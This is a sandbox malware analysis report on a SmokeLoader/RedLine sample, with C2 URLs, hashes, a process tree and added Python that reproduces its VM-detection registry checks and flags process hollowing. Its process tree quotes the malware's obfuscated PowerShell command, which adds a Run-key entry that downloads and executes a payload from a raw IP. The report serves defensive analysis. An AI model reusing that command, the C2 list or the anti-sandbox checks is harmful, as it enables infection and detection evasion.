Analysis
max time kernel: 154s
max time network: 159s
platform: windows7_x64
resource: win7v20210410
submitted: 13-08-2021 07:58
Static task static1
Behavioral task behavioral1: sample c75de20160110a422ccf173ce11e0aca.exe, resource win7v20210410
Behavioral task behavioral2: sample c75de20160110a422ccf173ce11e0aca.exe, resource win10v20210410
General
Target: c75de20160110a422ccf173ce11e0aca.exe
Size: 180KB
MD5: c75de20160110a422ccf173ce11e0aca
SHA1: 030a2a6dd9899032b22bb881b34f2e8190812675
SHA256: 352d461ee47bb9c6618eb86b1e8b10721c0b0dfd4a4b3e85dfb939f6d101e942
SHA512: 54a1cc95b2566333caba0abb961b4ab7c5575bb8e0da63d2e114ab0c6c241884f97ce665be6418cdb85a92acf2fabc9fd64b027c11e36a3e30c6b699e1ce72f7
Malware Config
Extracted family: smokeloader
Version: 2020
C2 URLs:
http://readinglistforjuly1.xyz/
http://readinglistforjuly2.xyz/
http://readinglistforjuly3.xyz/
http://readinglistforjuly4.xyz/
http://readinglistforjuly5.xyz/
http://readinglistforjuly6.xyz/
http://readinglistforjuly7.xyz/
http://readinglistforjuly8.xyz/
http://readinglistforjuly9.xyz/
http://readinglistforjuly10.xyz/
http://readinglistforjuly1.site/
http://readinglistforjuly2.site/
http://readinglistforjuly3.site/
http://readinglistforjuly4.site/
http://readinglistforjuly5.site/
http://readinglistforjuly6.site/
http://readinglistforjuly7.site/
http://readinglistforjuly8.site/
http://readinglistforjuly9.site/
http://readinglistforjuly10.site/
http://readinglistforjuly1.club/
http://readinglistforjuly2.club/
http://readinglistforjuly3.club/
http://readinglistforjuly4.club/
http://readinglistforjuly5.club/
http://readinglistforjuly6.club/
http://readinglistforjuly7.club/
http://readinglistforjuly8.club/
http://readinglistforjuly9.club/
http://readinglistforjuly10.club/
Signatures
RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
SmokeLoader
Modular backdoor trojan in use since 2014.
suricata: ET MALWARE Sharik/Smoke CnC Beacon 11
Identifies VirtualBox via ACPI registry values (likely anti-VM) (2 TTPs)
Downloads MZ/PE file
Executes dropped EXE (6 IoCs)
  PID 728   388E.exe
  PID 804   3C46.exe
  PID 1300  Runtimebroker.exe
  PID 968   3FC0.exe
  PID 1012  43C7.exe
  PID 800   4ABA.exe
Checks BIOS information in registry (2 TTPs, 2 IoCs)
BIOS information is often read in order to detect sandboxing environments.
  Key value queried  \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion  (4ABA.exe)
  Key value queried  \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion   (4ABA.exe)
Deletes itself (1 IoC)
  PID 1288 (no process name recorded)
Drops startup file (2 IoCs)
  File created                  C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\svchostsw.exe  (cmd.exe)
  File opened for modification  C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\svchostsw.exe  (cmd.exe)
Loads dropped DLL (2 IoCs)
  PID 804  3C46.exe  (2 events)
YARA rule match: themida (2 IoCs)
  C:\Users\Admin\AppData\Local\Temp\4ABA.exe
  behavioral1/memory/800-94-0x0000000000BF0000-0x0000000000BF1000-memory.dmp
Checks whether UAC is enabled (1 IoC)
  Key value queried  \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA  (4ABA.exe)
Suspicious use of NtSetInformationThreadHideFromDebugger (1 IoC)
  PID 800  4ABA.exe
Suspicious use of SetThreadContext (1 IoC)
  PID 1084 (c75de20160110a422ccf173ce11e0aca.exe) set thread context of PID 1228 (c75de20160110a422ccf173ce11e0aca.exe)
Enumerates physical storage devices (1 TTP)
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour. (This is the sandbox's generic description of the heuristic; nothing else in this report shows file encryption, and the same drive enumeration is part of the anti-sandbox checks below.)
Checks SCSI registry key(s) (3 TTPs, 3 IoCs)
SCSI information is often read in order to detect sandboxing environments.
  Key opened      \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI  (c75de20160110a422ccf173ce11e0aca.exe)
  Key queried     \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI  (c75de20160110a422ccf173ce11e0aca.exe)
  Key enumerated  \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI  (c75de20160110a422ccf173ce11e0aca.exe)
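The two registry signatures above (SystemBiosVersion/VideoBiosVersion read by 4ABA.exe, and the SCSI enumeration by the c75de...exe child) are the standard hypervisor fingerprinting reads: on a VirtualBox, VMware or QEMU guest the vendor name sits in those values in clear text. The Python below is an added example, not code from the report or from the sample. It reproduces the decision against constructed registry snapshots so an analyst can see which strings give a sandbox away; the marker list and the sample values are assumptions (the report does not disclose what the sample compares against), and `read_live_registry()` pulls the real values through `winreg` when run on a Windows host.

```python
"""Reproduce the BIOS and SCSI registry reads flagged in the signatures above.

4ABA.exe queries SystemBiosVersion/VideoBiosVersion and the injected
c75de...exe child enumerates HKLM\SYSTEM\ControlSet001\Enum\SCSI. On a
hypervisor guest these values carry the vendor name in clear text, which is
all a sample needs to decide it is being watched.
"""
import sys

# Hypervisor fingerprints searched for (assumption: illustrative list, not
# the sample's actual one, which the report does not disclose).
VM_MARKERS = ("VBOX", "VIRTUALBOX", "VMWARE", "QEMU", "HYPER-V")

# Constructed registry snapshots: what the three queried locations return on
# a VirtualBox guest versus a physical host. Real values vary by vendor.
VIRTUALBOX_GUEST = {
    r"HKLM\HARDWARE\DESCRIPTION\System\SystemBiosVersion": ["VBOX   - 1"],
    r"HKLM\HARDWARE\DESCRIPTION\System\VideoBiosVersion": [
        "Oracle VM VirtualBox Version 6.1.22 VBE BIOS"],
    r"HKLM\SYSTEM\ControlSet001\Enum\SCSI": [
        "Disk&Ven_VBOX&Prod_HARDDISK", "CdRom&Ven_VBOX&Prod_CD-ROM"],
}
PHYSICAL_HOST = {
    r"HKLM\HARDWARE\DESCRIPTION\System\SystemBiosVersion": ["DELL   - 1072009", "1.14.0"],
    r"HKLM\HARDWARE\DESCRIPTION\System\VideoBiosVersion": ["Intel Video BIOS"],
    r"HKLM\SYSTEM\ControlSet001\Enum\SCSI": ["Disk&Ven_NVMe&Prod_Samsung_SSD_970"],
}


def vm_indicators(registry_view):
    """Map each queried key to the sorted list of markers found in its values."""
    hits = {}
    for key, values in registry_view.items():
        found = sorted({m for v in values for m in VM_MARKERS if m in v.upper()})
        if found:
            hits[key] = found
    return hits


def looks_like_vm(registry_view):
    """The sample's decision: any marker in any of the three keys."""
    return bool(vm_indicators(registry_view))


def read_live_registry():
    """Read the same three locations on the current Windows host (None elsewhere)."""
    if sys.platform != "win32":
        return None
    import winreg  # Windows-only module, imported lazily
    view = {}
    with winreg.OpenKey(winreg.HKEY_LOCAL_MACHINE, r"HARDWARE\DESCRIPTION\System") as key:
        for name in ("SystemBiosVersion", "VideoBiosVersion"):
            value, _type = winreg.QueryValueEx(key, name)  # REG_MULTI_SZ comes back as a list
            view[rf"HKLM\HARDWARE\DESCRIPTION\System\{name}"] = (
                list(value) if isinstance(value, list) else [str(value)])
    with winreg.OpenKey(winreg.HKEY_LOCAL_MACHINE, r"SYSTEM\ControlSet001\Enum\SCSI") as key:
        subkeys = winreg.QueryInfoKey(key)[0]
        view[r"HKLM\SYSTEM\ControlSet001\Enum\SCSI"] = [
            winreg.EnumKey(key, i) for i in range(subkeys)]
    return view


if __name__ == "__main__":
    for label, view in (("VirtualBox guest", VIRTUALBOX_GUEST), ("physical host", PHYSICAL_HOST)):
        print(f"{label}: vm={looks_like_vm(view)} hits={vm_indicators(view)}")
    live = read_live_registry()
    if live is not None:
        print(f"this host: vm={looks_like_vm(live)} hits={vm_indicators(live)}")
```

Run on a sandbox guest, a non-empty `vm_indicators()` result is the list of values the sandbox has to patch (SMBIOS strings and SCSI device IDs) before this sample will execute its real payload.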
Suspicious behavior: EnumeratesProcesses (64 IoCs)
  PID 1228  c75de20160110a422ccf173ce11e0aca.exe  (2 events)
  PID 1288  (no process name recorded)            (62 events)
Suspicious behavior: GetForegroundWindowSpam (1 IoC)
  PID 1288 (no process name recorded)
Suspicious behavior: MapViewOfSection (1 IoC)
  PID 1228  c75de20160110a422ccf173ce11e0aca.exe
Suspicious use of AdjustPrivilegeToken (4 IoCs)
  Token: SeShutdownPrivilege  PID 1288 (no process name recorded)  (2 events)
  Token: SeDebugPrivilege     PID 800   4ABA.exe
  Token: SeDebugPrivilege     PID 972   powershell.exe
Suspicious use of FindShellTrayWindow (4 IoCs)
  PID 1288 (no process name recorded)  (4 events)
Suspicious use of SendNotifyMessage (6 IoCs)
  PID 1288 (no process name recorded)  (6 events)
Suspicious use of SetWindowsHookEx (1 IoC)
  PID 728  388E.exe
Suspicious use of WriteProcessMemory (42 IoCs)
  PID 1084 (c75de20160110a422ccf173ce11e0aca.exe) wrote to memory of PID 1228 (c75de20160110a422ccf173ce11e0aca.exe)  (7 events)
  PID 1288 (no process name recorded) wrote to memory of PID 728 (388E.exe)                                            (4 events)
  PID 1288 (no process name recorded) wrote to memory of PID 804 (3C46.exe)                                            (4 events)
  PID 804 (3C46.exe) wrote to memory of PID 1300 (Runtimebroker.exe)                                                   (4 events)
  PID 1288 (no process name recorded) wrote to memory of PID 968 (3FC0.exe)                                            (4 events)
  PID 1288 (no process name recorded) wrote to memory of PID 1012 (43C7.exe)                                           (4 events)
  PID 1288 (no process name recorded) wrote to memory of PID 800 (4ABA.exe)                                            (7 events)
  PID 1300 (Runtimebroker.exe) wrote to memory of PID 972 (powershell.exe)                                             (4 events)
  PID 968 (3FC0.exe) wrote to memory of PID 1564 (cmd.exe)                                                             (4 events)
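Read together, the SetThreadContext and WriteProcessMemory entries above describe process hollowing: PID 1084 starts a second copy of its own image (PID 1228), writes into it seven times, then replaces a thread context, and from that point it is PID 1228 that enumerates processes and maps sections. The 36KB region at 0x400000 in PID 1228 and the mapping recorded at 0x402E1A in the dump list are where an analyst would look for the replaced image. The Python below is an added example, not part of the report: it parses event lines in the report's own wording (constructed from the two tables above, one line per event) and correlates them per source/target pair. The verdict labels are my own; the report itself only lists the raw API events.

```python
"""Correlate cross-process memory events from the sandbox into a hollowing verdict.

The report logs 'PID A wrote to memory of B' (WriteProcessMemory) and
'PID A set thread context of B' (SetThreadContext) as separate signatures.
Grouping them per (source, target) pair, and checking whether the target
runs the same image as the source, turns two weak signals into the classic
hollowing pattern: spawn a suspended copy of yourself, overwrite its image,
point the main thread at the new entry point, resume.
"""
import re
from collections import defaultdict

# Constructed from the event tables on this page (duplicates collapsed).
# Trailing image names are source then target; the unnamed process 1288
# has no source image in the log, so only the target name follows.
EVENTS = """\
PID 1084 set thread context of 1228 1084 c75de20160110a422ccf173ce11e0aca.exe c75de20160110a422ccf173ce11e0aca.exe
PID 1084 wrote to memory of 1228 1084 c75de20160110a422ccf173ce11e0aca.exe c75de20160110a422ccf173ce11e0aca.exe
PID 1288 wrote to memory of 728 1288 388E.exe
PID 1288 wrote to memory of 804 1288 3C46.exe
PID 804 wrote to memory of 1300 804 3C46.exe Runtimebroker.exe
PID 1300 wrote to memory of 972 1300 Runtimebroker.exe powershell.exe
PID 968 wrote to memory of 1564 968 3FC0.exe cmd.exe
"""

_EVENT_RE = re.compile(
    r"^PID (?P<src>\d+) (?P<op>wrote to memory of|set thread context of) "
    r"(?P<dst>\d+) \d+(?P<names>(?: \S+)*)$"
)

OP_NAMES = {
    "wrote to memory of": "WriteProcessMemory",
    "set thread context of": "SetThreadContext",
}


def parse_events(text):
    """Yield (src_pid, dst_pid, api, src_image, dst_image) for each event line."""
    for line in text.splitlines():
        m = _EVENT_RE.match(line.strip())
        if not m:
            continue
        names = m.group("names").split()
        # Two names: source image then target image. One name: only the
        # target is known, because the source had no image name in the log.
        src_img = names[0] if len(names) == 2 else None
        dst_img = names[-1] if names else None
        yield int(m.group("src")), int(m.group("dst")), OP_NAMES[m.group("op")], src_img, dst_img


def find_hollowing(text):
    """Return {(src_pid, dst_pid): verdict} for every source/target pair seen.

    'process hollowing' needs both APIs against a target that runs the same
    image as the source; both APIs against a different image is reported as
    a thread hijack; a write alone is left as an observation.
    """
    seen = defaultdict(lambda: {"apis": set(), "src_img": None, "dst_img": None})
    for src, dst, api, src_img, dst_img in parse_events(text):
        rec = seen[(src, dst)]
        rec["apis"].add(api)
        rec["src_img"] = rec["src_img"] or src_img
        rec["dst_img"] = rec["dst_img"] or dst_img

    verdicts = {}
    for pair, rec in seen.items():
        if {"WriteProcessMemory", "SetThreadContext"} <= rec["apis"]:
            same_image = rec["src_img"] is not None and rec["src_img"] == rec["dst_img"]
            verdicts[pair] = "process hollowing" if same_image else "remote thread hijack"
        else:
            verdicts[pair] = "write only (no thread redirection observed)"
    return verdicts


if __name__ == "__main__":
    for (src, dst), verdict in sorted(find_hollowing(EVENTS).items()):
        print(f"{src} -> {dst}: {verdict}")
```

Only the 1084 -> 1228 pair meets both conditions; the other writes are parents staging freshly created children, which is why the report attributes the network beacon and the SCSI/process enumeration to PID 1228 rather than to the original PID 1084.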
Processes
Indentation shows tree depth. The dropped executables 388E.exe, 3C46.exe, 3FC0.exe, 43C7.exe and 4ABA.exe appear at the top level because the process that wrote into each of them (PID 1288) has no image name recorded in this report.

C:\Users\Admin\AppData\Local\Temp\c75de20160110a422ccf173ce11e0aca.exe
  command line: "C:\Users\Admin\AppData\Local\Temp\c75de20160110a422ccf173ce11e0aca.exe"
  - Suspicious use of SetThreadContext
  - Suspicious use of WriteProcessMemory
    C:\Users\Admin\AppData\Local\Temp\c75de20160110a422ccf173ce11e0aca.exe
      command line: "C:\Users\Admin\AppData\Local\Temp\c75de20160110a422ccf173ce11e0aca.exe"
      - Checks SCSI registry key(s)
      - Suspicious behavior: EnumeratesProcesses
      - Suspicious behavior: MapViewOfSection
C:\Users\Admin\AppData\Local\Temp\388E.exe
  command line: C:\Users\Admin\AppData\Local\Temp\388E.exe
  - Executes dropped EXE
  - Suspicious use of SetWindowsHookEx
C:\Users\Admin\AppData\Local\Temp\3C46.exe
  command line: C:\Users\Admin\AppData\Local\Temp\3C46.exe
  - Executes dropped EXE
  - Loads dropped DLL
  - Suspicious use of WriteProcessMemory
    C:\ProgramData\Runtimebroker.exe
      command line: "C:\ProgramData\Runtimebroker.exe"
      - Executes dropped EXE
      - Suspicious use of WriteProcessMemory
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
          command line: powershell Set-ItemProperty -Path 'HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run' -Name 'Sound device' -Value 'Cmd.Exe /c POwERsheLl -WinD HIDDen -CoMmAN (New-Object System.Net.WebClient).DownloadFile((''http://193.56.146.55/Ru''+''nti''+''m''+''ebr''+''oke''+''r.exe''),($env:TEMP+''\Vp''+''nm.e''+''xe''));Start-Process ($env:TEMP+''\V''+''pn''+''m.exe'')'
          - Suspicious use of AdjustPrivilegeToken
C:\Users\Admin\AppData\Local\Temp\3FC0.exe
  command line: C:\Users\Admin\AppData\Local\Temp\3FC0.exe
  - Executes dropped EXE
  - Suspicious use of WriteProcessMemory
    C:\Windows\SysWOW64\cmd.exe
      command line: cmd /Q /C C:\Users\Admin\AppData\Local\Temp/s.bat
      - Drops startup file
C:\Users\Admin\AppData\Local\Temp\43C7.exe
  command line: C:\Users\Admin\AppData\Local\Temp\43C7.exe
  - Executes dropped EXE
C:\Users\Admin\AppData\Local\Temp\4ABA.exe
  command line: C:\Users\Admin\AppData\Local\Temp\4ABA.exe
  - Executes dropped EXE
  - Checks BIOS information in registry
  - Checks whether UAC is enabled
  - Suspicious use of NtSetInformationThreadHideFromDebugger
  - Suspicious use of AdjustPrivilegeToken
Network
MITRE ATT&CK Matrix ATT&CK v6
Downloads
C:\ProgramData\Runtimebroker.exe (also recorded as \ProgramData\Runtimebroker.exe; identical hashes to 3C46.exe, so 3C46.exe drops a copy of itself under ProgramData and launches it, as the process tree shows)
  MD5     4f2f17aaf39970811b9f822b1496dc01
  SHA1    bf89cf8fbf826b02d4d3eebe8ef3aee1455dc876
  SHA256  3ea9f73f3772290bdfe770b50dc7c726098b6712d327acc90200b31980c8576b
  SHA512  44c35d1b0188a05c65fb5089ab5c6c5fb4baf65d3e6d065c96db167a5cccf344185a40fda256da69f518275670ca3e0bc1097064edb8cf0ac0c2c604cd1368a9
C:\Users\Admin\AppData\Local\Temp\388E.exe
  MD5     a69e12607d01237460808fa1709e5e86
  SHA1    4a12f82aee1c90e70cdf6be863ce1a749c8ae411
  SHA256  188e05efb42c1f7fdb5c910a6614f710a87ae642b23ac9ffe3f75246744865bc
  SHA512  7533e6da6bac0405fc8b608da8020b54b6ee02592e6fd40ea342e130a8a876ae5ef4a1fd636d95e76339dbf8be45cecbd22ca2d0a4635b055ffafec3d7e15284
C:\Users\Admin\AppData\Local\Temp\3C46.exe (same file as C:\ProgramData\Runtimebroker.exe)
  MD5     4f2f17aaf39970811b9f822b1496dc01
  SHA1    bf89cf8fbf826b02d4d3eebe8ef3aee1455dc876
  SHA256  3ea9f73f3772290bdfe770b50dc7c726098b6712d327acc90200b31980c8576b
  SHA512  44c35d1b0188a05c65fb5089ab5c6c5fb4baf65d3e6d065c96db167a5cccf344185a40fda256da69f518275670ca3e0bc1097064edb8cf0ac0c2c604cd1368a9
C:\Users\Admin\AppData\Local\Temp\3FC0.exe
  MD5     b19ac380411ed5d8b5a7e7e0c1da61a6
  SHA1    9665c20336a5ce437bbf7b564370bfa43e99954c
  SHA256  aba88a19b2f6e2cf9a6a41ab8661d83c433acec363028f58dd74d37e335c7619
  SHA512  73b4e3555cf9496a7138a2c7071ed81a754493afaf15f604a305f3eb051ed72645731a6174b0934f24371dbe5bd8c0185516f87778a018d84df4fff8aea0c208
C:\Users\Admin\AppData\Local\Temp\43C7.exe
  MD5     5707ddada5b7ea6bef434cd294fa12e1
  SHA1    45bb285a597b30e100ed4b15d96a29d718697e5e
  SHA256  85205aa3ad824b5172d5da841d253c3a54aff5d00eb2c208029e9453008f132c
  SHA512  91cbdbf8da7e4e34de45a99359bdc321a66d6646ed14a1042346824c8daa6237281eff3b00fd162009c5e3204e5a7cd3b944f05e18b7f9066d0f9dd16b56bf13
C:\Users\Admin\AppData\Local\Temp\4ABA.exe (Themida-packed, per the YARA match above)
  MD5     717d65dba56f47e540dca074c3977b3d
  SHA1    d58aa30f826f41663e693f0ad930fdce584f1672
  SHA256  61fb1160ae372d9ba1c95400d5439450c6a66cdf073fa50ee2d5d10c4952cbb3
  SHA512  b06e4358411eb8f6315c574922c021bd57218b3e6a0ed727df6b44e20e7818d40fb0347050ce9145ea7e0fd56a7fa93a2358e524c0df030d6d44067c7c83510d
C:\Users\Admin\AppData\Local\Temp\s.bat (run by 3FC0.exe via cmd.exe; creates the Startup-folder svchostsw.exe)
  MD5     8fec98c95605e4fe5120eec3b2287dd2
  SHA1    41b14cf07ccbbbab34bc966fb6cb9afdb5bbadd7
  SHA256  700c2415c522ecceb578abff3f86c8ab40de7fdfc7295e6b120f55ce9f44d115
  SHA512  25063af35517a858652eac120a9649fb8d6c2b9e8613dc0ed29ea160c7f8b23572fd5b46c076b508a5df0b80e47eb7cb5580479c6ddb75d5e80e8a4ed3f1cb08
Memory dumps
memory/728-65-0x0000000000000000-mapping.dmp
memory/800-94-0x0000000000BF0000-0x0000000000BF1000-memory.dmp (4KB)
memory/800-88-0x0000000000000000-mapping.dmp
memory/800-97-0x0000000002800000-0x0000000002801000-memory.dmp (4KB)
memory/804-80-0x00000000002D0000-0x000000000030B000-memory.dmp (236KB)
memory/804-81-0x0000000000400000-0x0000000002C7C000-memory.dmp (40.5MB)
memory/804-69-0x0000000000000000-mapping.dmp
memory/968-98-0x0000000004E20000-0x0000000005031000-memory.dmp (2.1MB)
memory/968-93-0x0000000000400000-0x0000000002D86000-memory.dmp (41.5MB)
memory/968-92-0x0000000003290000-0x00000000034D3000-memory.dmp (2.3MB)
memory/968-108-0x0000000000400000-0x0000000002D86000-memory.dmp (41.5MB)
memory/968-77-0x0000000000000000-mapping.dmp
memory/972-111-0x00000000022D0000-0x00000000022D1000-memory.dmp (4KB)
memory/972-112-0x00000000025D0000-0x00000000025D1000-memory.dmp (4KB)
memory/972-110-0x0000000004902000-0x0000000004903000-memory.dmp (4KB)
memory/972-100-0x0000000000000000-mapping.dmp
memory/972-109-0x0000000004900000-0x0000000004901000-memory.dmp (4KB)
memory/972-104-0x0000000000940000-0x0000000000941000-memory.dmp (4KB)
memory/972-105-0x0000000004940000-0x0000000004941000-memory.dmp (4KB)
memory/1012-96-0x0000000004870000-0x0000000004871000-memory.dmp (4KB)
memory/1012-82-0x0000000000000000-mapping.dmp
memory/1012-85-0x0000000000950000-0x0000000000951000-memory.dmp (4KB)
memory/1084-63-0x00000000001B0000-0x00000000001BA000-memory.dmp (40KB)
memory/1228-62-0x00000000752F1000-0x00000000752F3000-memory.dmp (8KB)
memory/1228-61-0x0000000000402E1A-mapping.dmp
memory/1228-60-0x0000000000400000-0x0000000000409000-memory.dmp (36KB)
memory/1288-64-0x0000000003D40000-0x0000000003D56000-memory.dmp (88KB)
memory/1300-75-0x0000000000000000-mapping.dmp
memory/1300-87-0x0000000000400000-0x0000000002C7C000-memory.dmp (40.5MB)
memory/1564-103-0x0000000000000000-mapping.dmp